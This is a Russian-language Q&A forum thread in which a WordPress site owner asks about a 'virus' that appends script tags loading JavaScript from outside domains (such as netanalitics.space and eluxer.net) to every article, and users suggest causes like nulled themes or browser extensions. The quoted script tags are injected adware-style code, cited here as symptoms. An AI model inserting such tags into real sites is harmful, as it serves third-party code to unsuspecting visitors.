Странный вирус на сайте WordPress?

Доброго времени суток!
Недавно на сайте появился странный "вирус". Который добавляет в конец статьи такие скрипты:
<script src="//s3.amazonaws.com/js-cache/145f309ae16975ba1c.js"></script>
<script src="http://netanalitics.space/addons/lnkr5.min.js" type="text/javascript"></script>
<script src="http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51859x5215x&amp;r=47" type="text/javascript"></script>
<script src="http://eluxer.net/code?id=105&amp;subid=51859_5215_" type="text/javascript"></script>

И на странице контактов из-за этого перестала отображаться google карта.
При чем эта строка прописана на каждой строке в конце документа:
<script src="//s3.amazonaws.com/js-cache/145f309ae16975ba1c.js"></script>

но через админку WordPress ее не видно, и скачав все файлы сайта и проверив их через Total Commander на совпадение - не дало результатов. В базе удалил все строки с таким совпадение - тоже не помогло.
Проверка на вирусы ничего не дала. "Левых" плагинов не установлено.
В консоли бывает появляется ошибка которая указывает на ошибку в этом же скрипте, которая выводится постоянно в консоли много раз одна и та же:
<script src="//s3.amazonaws.com/js-cache/145f309ae16975ba1c.js"></script>

скрин предоставить не могу, так сейчас ее нету.
При чем google карта не отображается только в Chrome и Opera, а в FireFox все нормально работает.
Что посоветуете?
  • Вопрос задан
  • 1305 просмотров
Пригласить эксперта
Ответы на вопрос 5
@AnneSmith
самая ленивая
халява, сэр? :)
если этой рекламы не было раньше, то сравнение файлов с более ранней версией даст вам ответ
может кстати сидеть и в базе данных
Ответ написан
@4ainik
начинал с бейсика на 286 в 1994
у вас 2 проблемы:

1) как это попало на сайт, и это главное, т.к. не устранив причину будете получать п.2
2) где эта хрень находится

обратиться к специалистам за оплату
Ответ написан
Комментировать
politon
@politon
HTML5,CSS3,JS,PHP,SQL,API,canvas,animation...
ничего странного нет в варезных шаблонах обычное явление. Халява в действии :)
Ответ написан
@Ip9
В моем случае, так вело себя расширение для браузера. Достаточно его просто отключить. То есть, вероятно, проблема локальная и на стороне клиента. Или же, подобный механизм вшит в шаблон или какой-то из скриптов
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы
04 мая 2024, в 06:10
4000 руб./за проект
04 мая 2024, в 05:49
10000 руб./за проект
04 мая 2024, в 03:57
10000 руб./за проект